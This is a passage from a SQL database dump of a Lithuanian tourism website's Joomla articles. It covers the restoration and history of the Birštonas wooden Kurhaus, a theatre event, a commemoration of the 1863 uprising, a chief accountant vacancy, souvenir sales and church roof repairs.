00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,187,'','',1,4148,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',23,'*',''),(119,203,'Atgimsta Birštono kurhauzas','atgimsta-birtono-kurhauzas','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/birstono_kurhauzas/main.jpg\" border=\"0\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\">\n<p>Birštoniečiai ir kurorto svečiai laukia atstatyto vieno iš nedaugelio Lietuvoje išlikusių tokio tipo pastatų – medinio Kurhauzo – atidarymo birželio mėnesį. Įgyvendinamo projekto „Birštono kurorto kultūros vertybių kompleksinis pritaikymas turizmo paslaugų plėtrai“ vertė – 4,8 mln litų. ES struktūrinių fondų lėšomis rekonstruotas Birštono kurhauzo kompleksas, kurį sudaro trys kultūros paveldo objektai: medinis kurhauzas, administracinis pastatas ir pastatas-archyvas. Šiuo metu Kurhauze atliekamas paskutinis darbų etapas – įrengiamos šildymo, vandentiekio ir gaisrinės signalizacijos sistemos.</p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/birstono_kurhauzas/1.jpg\" border=\"0\" width=\"740\" height=\"829\" style=\"border: 0;\" /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/birstono_kurhauzas/2.jpg\" border=\"0\" width=\"740\" height=\"613\" style=\"border: 0;\" /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Rekonstruotame Birštono kurhauze naujai įrengtas vidaus interjeras: scena, kameriniams renginiams skirta didžioji salė ir dvi erdvės, kuriose vyks ekspozicijos ir kūrybinės dirbtuvės. Kaip teigia Birštono savivaldybės merė Nijolė Dirginčienė, „Kurhauzas taps patraukliu traukos centru kurorto svečiams, menininkams ir birštoniečiams. Tai unikali erdvė, kurioje vyks klasikinės muzikos, džiazo, pučiamųjų koncertai ir bus eksponuojami meno kūriniai. Pati erdvė apsprendžia, jog Kurhauze skambės kamerinio žanro kūriniai. Stilingas interjeras ir keturi barokinio stiliaus šviestuvai, atvežti iš Italijos, sukuria savitą, elegantišką apšvietimą, būdingą reprezentacinei salei, todėl čia gali būti pasirašomos svarbios sutartys, rengiami oficialūs susitikimai. Tikimės, kad Birštono kurhauzas, vienintelis toks išlikęs medinės architektūros pastatas Lietuvoje, kurį pavyko atkurti – taps reikšmingu įvykiu ir Birštonui, ir Lietuvai.“</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Aukštos kokybės garso akustinė sistema, stiprintuvai, jaukią atmosferą kuriantys „užliejančios šviesos“ šviestuvai, garso ir šviesų valdymo pultai, įrengti didžiojoje salėje, leis Kurhauze siūlyti ir realizuoti kamerinius, aukšto lygio kultūros renginius. Pasak Birštono kultūros centro direktoriaus Zigmo Vileikio, „tokio pobūdžio scena skirta kamerinės muzikos atlikėjams, monospektakliams, poezijos skaitymams, muzikos meistriškumo kursams. Taip pat bus atsižvelgta į sanatorijų klientų poreikius ir tradicinę kurhauzo paskirtį – numatoma, kad šiame stilingame pastate vyks šokiai brandaus amžiaus žmonėms, gyvai gros muzika, bus kviečiami populiarios muzikos atlikėjai, vyks grožinės literatūros skaitymai. Baigiamoje įrengti ekspozicijų salėje bus organizuojamos įvairios menininkų parodos, rengiamos edukacijos, o kitoje salėje numatyta kūrybinių industrijų, meno studijos, liaudies amatų veikla.“ Birštone šiuo metu gyvenantis menininkas Martynas Gaubas džiaugėsi atsiveriančiomis Kurhauzo galimybėmis ir sakė, kad jau planuojantis Lietuvos ir užsienio menininkų kūrybos pristatymus, kurie meno sklaidos požiūriu bus įdomūs ir birštoniečiams, ir kurorto svečiams. Kurhauze gali vykti konferencijos ir svarbūs susitikimai, todėl manoma, kad kurorto salės erdvė taps patraukli konferencinio turizmo ir renginių organizatoriams.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Kurhauzo scenos garso ir šviesos įranga įsigyta, Birštono savivaldybei vykdant Europos teritorinio bendradarbiavimo tikslo 2007–2013 metų Latvijos-Lietuvos bendradarbiavimo per sieną programos projektą“. Kūrybinių industrijų vystymas Latvijos-Lietuvos pasienio regionuose/LLIII-194 Mission: to create“. Šio projekto tikslas – sukurti palankią aplinką kūrybinių industrijų vystymuisi projekto veiklos regionuose ir padidinti jų lyginamąjį svorį Latvijoje ir Lietuvoje, siekiant darnaus bendradarbiavimo, skatinant idėjų komercializaciją audiovizualinėse, multimedijų ir dizaino šakose. Birštono savivaldybės administracijos Strateginio planavimo ir investicijų skyriaus vedėjas Antanas Šabanas pasakojo, kad dalyvavimas šiame projekte, leidusiame Kurhauzui nupirkti scenos garso įrangą, buvo laimės dalykas: „rengiant vieną projektą, atsitiktinumo dėka susipažinome su projektų partneriais iš Rokiškio (Lietuva), Liepojos, Rundalės ir Daugpilio (Latvija), o jų veikla davė impulsų ir idėjų bendriems projektams. Apsilankius Daugpilyje pamatėme, kaip iš šio projekto lėšų yra atnaujinama dalis žymaus abstrakcionisto Mark Rothko centro patalpų. Šis pavyzdys įkvėpė, nes be minėto bendro Latvijos-Lietuvos projekto Birštono savivaldybė nebūtų galėjusi įgyvendinti Kurhauzo muzikinės erdvės sukūrimo ir „suskambėjimo“. Kurhauze esanti scenos garso ir apšvietimo aparatūra yra suderinta su Birštono kultūros centre esančia įgarsinimo aparatūra, todėl atsiveria didesnės kokybiškos muzikos ir kūrybos realizavimo, kūrybinių industrijų vystymo galimybės“. Birštono kurhauzo scenos garso ir šviesos įrangos vertė – apie 300 tūkst. Lt.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Praėjusių metų rudenį ir žiemą Kurhauze vyko intensyvūs statybos darbai, buvo įrengiamos didžiosios salės grindys, stovėjo pastoliai, vykdomi išorės rekonstrukcijos ir apdailos darbai. Kurhauzo scenos montavimo darbai ir vidaus interjero kūrimas buvo atliktas šį pavasarį.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Vokiškos kilmės žodis kurhauzas reiškia ir poilsio namus kurorte, ir poilsio namų koncertų, šokių salę su bufetu. Kurhauzai Lietuvoje, Europos pavyzdžiu, buvo statomi kurortuose apie 1880 metus, XIX a. pab. ir tapdavo mėgstama poilsiautojų pramogų vieta. Kurhauzai buvo pastatyti Palangoje, Druskininkuose, Birštone – juose įrengti lošimo namai, bankų filialai. „Archyvinių duomenų apie Birštono medinį kurhauzą nėra daug, todėl neaišku, kas buvo pirmojo projekto autorius“, – teigia Birštono muziejaus istorikas Vytautas Kuzmickas, tyrinėjantis Birštono krašto istorinius archyvus. Savivaldybės Architektūros ir kraštotvarkos skyriaus vedėjas Mantas Michaliunjo patikslino, kad ant tarpukariu statyto Kurhauzo brėžinių, išlikusių archyve, yra pasirašęs diplomuotas inžinierius R. Steikūnas iš Kauno, tačiau ar tai jo projektas, nėra aišku.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Apie medinį Birštono kurhauzą, kaip statinį, kartu su kitais medinės architektūros pastatais, rašoma nuo 1857 m. XIX a. pab. jis įvardijamas kurhauzu, kurorto sale, kurioje buvo bufetas, šokių salė, stalo žaidimų, kortavimo stalai. Birštono kurhauze, skirtingai nuo kitų, banko filialų ir lošimų namų nebuvo – jis statytas pramogoms, ir jau tuo metu išsiskyrė ramiu, nuosaikiu kurortiniu stiliumi.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">V. Kuzmickas pabrėžė, jog „Birštono kurhauzas žymus tuo, kad jame buvo ruošiamasi 1863 m. sukilimui – didžiojoje kurorto salėje vyko vienas pirmųjų pasiruošimo sukilimui susirinkimų, kuriame dalyvavo keletas Lietuvos ir Lenkijos kultūrinio elito atstovų: italų kilmės Lietuvos grafikas, tapytojas Mykolas Elvyras Andriolis (Adomo Mickevičiaus „Pono Tado“ iliustracijų autorius), kilmingas bajoras, dailininkas, vienas iš sukilimo Vilniaus gubernijoje organizatorių, Antanas Zaleskis ir sukilimo Lenkijoje emisaras, prancūzų kilmės aristokratas Nestoras Diuleranas“. Žinoma ir tai, kad 1862 m. liepos mėn. Birštono kurhauze buvo uždrausta šokti.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Tarpukariu Birštono kurhauze veikė restoranas, buvo įrengta koncertų salė, kurioje atlikti rečitalių atvažiuodavo solistas Petras Oleka. Buvo įprasta, kad koncertai tęsdavosi nuo pusvalandžio iki valandos, ir vykdavo du kartus per savaitę. Kartais koncertuodavo pavasarininkai, jaunalietuviai. Kurhauzo lankytojų pramogoms buvo samdomas dūdų orkestras, kuris dvi valandas grodavo vidurdienį, pietų metu ir vakare – nuo 17 iki 20 val., vadinamuoju poilsio metu. Santūrus medinio kurhauzo interjeras buvo dekoruotas Kazio Šimonio pano, didžiojoje salėje įrengta pakyla muzikantams. Taip pat buvo įrengta lauko terasa, kurioje po skėčiais stovėjo staliukai, pagal to meto madą, apdengti baltomis staltiesėmis. Tuomet kurorto direktoriaus Balio Matulionio nurodymu Birštono kurhauze buvo atidaryta viena pirmųjų Lietuvoje dietinio maitinimo įstaigų. Archyvuose aptinkami įrašai, kad kurorto gydytojai, tarp jų – gydymo purvu pradininkas Jurgis Venckūnas – buvo nepatenkinti tuo, kad besigydantys sanatorijoje ir pramogaujantys Kurhauze „išsiblaškydavo ir nukrypdavo nuo kurortinio režimo“.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Antrojo pasaulinio karo metu medinis Kurhauzas nukentėjo nuo gaisro, tarybiniais metais buvo rekonstruotas ir įgavo modernesnę išraišką, medinės drožybos elementų. 4-tame deš. prie Kurhauzo buvo suformuotas šiltnamis, kuriame augintos ekologiškos daržovės, tęsiamos dietinio maitinimo tradicijos. Tuo laikotarpiu Kurhauze buvo įrengta sanatorinė valgykla.<br />2006 m. Birštono medinis kurhauzas įrašytas į architektūros paveldo objektų sąrašą.<br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Laura Narvidaitė<br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\">foto: Ramutis Gustaitis, Dovilė Adamonytė<br /><br /></p>\n<p style=\"text-align: center;\"><img src=\"images/stories/naujienos/birstono_kurhauzas/3.jpg\" border=\"0\" width=\"740\" height=\"555\" style=\"border: 0;\" /></p>\n<p> </p>',1,0,0,44,'2013-04-29 07:57:50',135,'','2013-04-29 08:01:20',135,0,'0000-00-00 00:00:00','2013-04-29 07:57:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',3,0,186,'','',1,4561,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',22,'*',''),(120,204,'Dainos ir ritmo spektaklis GAIDOS','dainos-ir-ritmo-spektaklis-gaidos','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/dainos_ir_ritmo_spektaklis_gaidos.jpg\" border=\"0\" width=\"200\" height=\"203\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\">\n<p>Š. m. gegužės 10 d. 18 val. Tytuvėnų Bernardinų vienuolyno refektorinėje salėje.</p>\n<p>Klaipėdos Jaunimo Teatras<br />ir režisierius Valentinas Masalskis<br /><br />Kompozitorė – Nijolė Sinkevičiutė<br />Scenografė – Renata Valcik<br />Režisieriaus padėjėjas – Andrius Chomičius</p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">Laima Akstinaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Vaidotas Bačianskas</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Margarita Intaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Neringa Krunglevičiūtė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Vaiva Kvedaravičiūtė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Rugilė Latvėnaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Juratė Leinartaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Evelina Lozdovskaja</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Simonas Lunevičius</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Pranciškus Megelinskas</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Elena Ozarinskaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Ieva Pakštytė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Gytis Šimelionis</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Raminta Šniaukštaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Asta Zacharovaitė</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Donatas Želvys</p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Trukmė – 45 min.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>\n<p style=\"text-align: center;\"> </p>\n<p> </p>',1,0,0,44,'2013-05-09 05:18:59',135,'','2013-05-09 05:25:03',135,0,'0000-00-00 00:00:00','2013-05-09 05:18:59','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',2,0,185,'','',1,4215,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',21,'*',''),(121,205,'Kviečiame į 1863 m. sukilimo minėjimą','kvieiame-1863-m-sukilimo-minjim','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/sukilimo_minejimas.jpg\" border=\"0\" style=\"border: 0;\" /><br /></td>\n<td style=\"text-align: center;\" valign=\"top\">\n<p><strong>Gegužės 18 d. 18 val.<br />KVIEČIAME<br />į 1863 m. sukilimo minėjimą</strong></p>\n<p><strong>Renginio programa:<br /></strong><br />18:00 iškilmingos šv. Mišios Tytuvėnų bažnyčioje.<br />18:45 eisena prie sukilėlių akmens, kovotojų pagerbimas.<br />20:00 minėjimas Šilo stadione.<br />20:30 Všį Tytuvėnų festivalis muzikinis performansas \" Kunigas sukilėlis\".<br />21:20 savanorių košės dalybos, bendravimas prie laužų.<br />22:00 ekskursija po Tytuvėnų bažnyčią bei vienuolyną.<br /><br />Visą dieną nuo 10 val. galima apsilankyti Riomerių mauzoliejinėje koplyčioje.<br /><br />Nuo 10 val. miestelio bibliotekoje veiks paroda \" Už Jūsų ir Mūsų laisvę!\", skirta sukilėliams.<br /><br /></p>\n</td>\n</tr>\n</tbody>\n</table>','',1,0,0,44,'2013-05-09 05:58:56',135,'','2013-05-15 11:49:33',135,0,'0000-00-00 00:00:00','2013-05-09 05:58:56','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',8,0,184,'','',1,4198,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',20,'*',''),(122,206,'Konkursas vyr. finansininko pareigoms eiti','konkursas-vyr-finansininko-s-pareigybms-eiti','','<p> Všį Tytuvėnų piligrimų centras skelbia konkursą vyr. finansininko (-ės) pareigoms eiti.</p>\r\n','\r\n<p class=\"MsoNormal\"><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',\'serif\'; mso-fareast-font-family: \'Times New Roman\'; mso-fareast-language: LT;\">Konkursą organizuojanti įstaiga: VšĮ „Tytuvėnų piligrimų centras“<br /> <br /> VšĮ „Tytuvėnų piligrimų centras“ vyr. finansininkas (-ė)<br /> <br />VŠĮ „TYTUVĖNŲ PILIGRIMŲ CENTRAS“ VYR. FINANSININKO (-ĖS) <br /> PAREIGYBĖS APRAŠYMAS <br /> <br /> I.    PAREIGYBĖS CHARAKTERISTIKA<br /> <br /> 1.    Vyr. finansininkas (-ė) yra darbuotojas, dirbantis pagal darbo sutartį.<br /> <br /> II.    PAREIGYBĖS PASKIRTIS<br /> <br /> 2.    Įgyvendinti VšĮ „Tytuvėnų piligrimų centras“ finansų ir apskaitos politiką, ir užtikrinti jos atitikimą šias sritis reglamentuojančių teisės aktų nuostatas.<br /> <br /> III.    PAREIGYBĖS VEIKLOS SRITIS<br /> <br /> 3.    Tvarko VšĮ „Tytuvėnų piligrimų centras“ buhalterinę apskaitą ir finansavimą; vykdo įvairius projektus. Rengia sąmatų projektus, atlieka ekonominius skaičiavimus dėl lėšų poreikio. Vykdo atliekamų operacijų einamąją ir paskesniąją finansų kontrolę.<br /> <br /> IV.    KVALIFIKACINIAI REIKALAVIMAI<br /> <br /> 4. Vyr. finansininkas, einantis šias pareigas, turi atitikti šiuos kvalifikacinius reikalavimus:<br /> 4.1. išmanyti Lietuvos Respublikos Konstituciją, Lietuvos Respublikos viešųjų įstaigų įstatymą, Lietuvos Respublikos darbo kodeksą, Lietuvos Respublikos įstatymus, Lietuvos Respublikos Vyriausybės nutarimus bei kitus teisės aktus, reglamentuojančius buhalterinę apskaitą ir finansinę atskaitomybę ir gebėti juos pritaikyti praktikoje;<br /> 4.2. išmanyti dokumentų tvarkymo ir apskaitos taisykles;<br /> 4.3. turėti aukštąjį universitetinį, aukštesnįjį arba jam prilygintą socialinių mokslų studijų srities ekonomikos, vadybos ir verslo administravimo krypties (buhalterinį) išsilavinimą ir ne mažesnę kaip 2 metų darbo patirtį buhalterinės apskaitos srityje;<br /> 4.4. mokėti dirbti kompiuteriu, kompiuterinėmis programomis: MS Word, MS Excel, MS Outlook, Internet Explorer, buhalterinės apskaitos programomis; <br /> 4.5. mokėti valdyti, savarankiškai kaupti, sisteminti, analizuoti ir apibendrinti informaciją;<br /> 4.6. sugebėti savarankiškai planuoti ir organizuoti savo veiklą ir rengti išvadas bei sklandžiai dėstyti mintis raštu ir žodžiu;<br /> 4.7. mokėti tvarkyti buhalterinę apskaitą.<br /> <br />Dokumentai priimami: iki <strong>2014-04-15</strong> dienos imtinai  VšĮ „Tytuvėnų piligrimų centre“, Maironio g. 2A, LT-86484 Tytuvėnai, Kelmės r. (Tytuvėnų vienuolyno pastatas)<br /> Išsamesnė informacija apie konkursą: 8 427 56223, 8 67497392 direktorė Asta Vaitkevičiūtė-Kizienė.</span></p>\r\n<p class=\"MsoNormal\"><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',\'serif\'; mso-fareast-font-family: \'Times New Roman\'; mso-fareast-language: LT;\">Asmenys, pageidaujantys dalyvauti konkurse, privalo pateikti konkursą organizuojančiai įstaigai šiuos dokumentus:</span></p>\r\n<p class=\"MsoNormal\"><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',\'serif\'; mso-fareast-font-family: \'Times New Roman\'; mso-fareast-language: LT;\">1. Prašymą dalyvauti konkurse;</span></p>\r\n<p class=\"MsoNormal\"><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',\'serif\'; mso-fareast-font-family: \'Times New Roman\'; mso-fareast-language: LT;\">2. Asmens tapatybę patvirtinantį dokumentą: </span></p>\r\n<p class=\"MsoNormal\"><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',\'serif\'; mso-fareast-font-family: \'Times New Roman\'; mso-fareast-language: LT;\">3. Išsilavinimą patvirtinantį dokumentą ir šių dokumentų kopijas;</span></p>\r\n<p class=\"MsoNormal\"><span style=\"font-size: 12.0pt; font-family: \'Times New Roman\',\'serif\'; mso-fareast-font-family: \'Times New Roman\'; mso-fareast-language: LT;\">4. Gyvenimo aprašymą.</span></p>\r\n<p><span style=\"font-family: \'Times New Roman\', serif; font-size: 12pt;\">5. Darbo patirtį (stažą) patvirtinančius dokumentus.</span></p>',-2,0,0,44,'2014-04-04 09:15:06',135,'','2014-04-27 15:06:14',135,0,'0000-00-00 00:00:00','2014-04-04 09:15:06','0000-00-00 00:00:00','{\"image_intro\":\"images\\/stories\\/naujienos\\/konkursas_buh.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/stories\\/naujienos\\/konkursas_buh.jpg\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,103,'','',1,200,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',1,'*',''),(123,207,'Pradedame prekiauti suvenyrais su Tytuvėnų simbolika','pradedame-prekiauti-suvenyrais-su-tytuvn-simbolika','','<table border=\"0\" width=\"100%\">\n<tbody>\n<tr>\n<td width=\"200\"><img src=\"images/stories/naujienos/suvenyrai.jpg\" border=\"0\" style=\"border: 0;\" /><br /></td>\n<td valign=\"top\">\n<p>Dėmesio!</p>\n<p>VšĮ “Tytuvėnų piligrimų centras” pradeda prekiauti suvenyrais su Tytuvėnų simbolika internetu.</p>\n<p>Visą suvenyrų asortimentą rasite adresu mūsų internetiniame puslapyje:</p>\n<p>www.tytuvenai.eu skiltyje <a href=\"http://www.tytuvenai.eu/index.php?option=com_content&amp;view=article&amp;id=79&amp;Itemid=69\">„Suvenyrai“</a><br /><br /></p>\n</td>\n</tr>\n</tbody>\n</table>','<p style=\"text-align: justify; text-indent: 1cm;\">Siūlome suvenyrų su Tytuvėnų, Kelmės ir Lietuvos simbolika. Suvenyrai skirti įvairioms progoms.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Pasirinktą suvenyrą išsiųsime registruotu paštu (paslaugos kaina 5 Lt) arba per LP Express kurjerių tarnybą (paslaugos kaina 10 Lt). Didesnio kiekio ir svorio suvenyrų siuntimas derinamas individualiai.</p>\n<p style=\"text-align: justify; text-indent: 1cm;\">Norintys įsigyti suvenyrų, kreipkitės el. p. info@tytuvenai.eu, telefonu 8 (427) 56223 arba užsukite adresu Maironio g. 1, Tytuvėnuose.<br /><br /></p>\n<p style=\"text-align: justify; text-indent: 1cm;\"> </p>\n<p style=\"text-align: center;\"> </p>\n<p> </p>',1,0,0,44,'2013-05-31 05:48:40',135,'','0000-00-00 00:00:00',135,0,'0000-00-00 00:00:00','2013-05-31 05:48:40','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_section\":\"\",\"link_section\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_vote\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_pdf_icon\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"language\":\"\",\"keyref\":\"\",\"alternative_readmore\":\"\"}',1,0,183,'','',1,4132,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',19,'*',''),(124,208,'Tytuvėnų ansamblio bažnyčios stogo keitimo darbai įpusėjo','tytuvn-ansamblio-banyios-stogo-keitimo-darbai-pusjo','','<p class=\"MsoNormal\">Įpusėjo projekto ,, Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, I etapas‘‘ stogo keitimo darbai. Darbai vyksta sklandžiai, stogo keitimas atliekamas be trukdžių.</p>\n<p class=\"MsoNormal\">Šiuo metu sutvirtintos stogo konstrukcijos, atliekami stogo skardinimo darbai, pasiruošta čerpių dėjimui. Šią savaitę parvežtas restauruotas bažnyčios stogo kryžius.</p>\n<p class=\"MsoNormal\">Projekto ,,Tytuvėnų Švč. Mergelės Marijos bažnyčios restauravimas ir pritaikymas viešojo kultūrinio turizmo reikmėms, I etapas‘‘ užbaigimo terminas š.m. lapkričio 30 d. Didžiąją dali darbų planuojama atlikti jau spalio mėnesį.</p>\n<p class=\"MsoNormal\">VŠĮ \"Tytuvėnų piligrimų centras\" informacija.</p>\n<p class=\"MsoNormal\">Galerija:</p>\n<p class=\"MsoNormal\"><img src=\"images/stories/1374059_344140525721645_1541002923_n 1.jpg\" border=\"0\" /></p>\n<p class=\"MsoNormal\"><img src=\"images/stories/1377969_344140439054987_93565927_n.jpg\" border=\"0\" /></p>\n<p class=\"MsoNormal\"><img src=\"images/stories/dsc07145.jpg\" border=\"0\" /> <img src=\"images/stories/dsc07144.jpg\" border=\"0\" /></p>\n<p class=\"MsoNormal\"><img src=\"images/stories/dsc07140.jpg\" border=\"0\" /></p>\n<p class=\"MsoNormal\"><img src=\"images/stories/dsc07137.jpg\" border=\"0\" /></p>','',1,0,0,44,'2013-09-30 12:57:04',135,'','2013-10-04 07:48:48',135,0,'0000-00-00 00:00:00','2013-09-30 12:57:04','0000-00-00 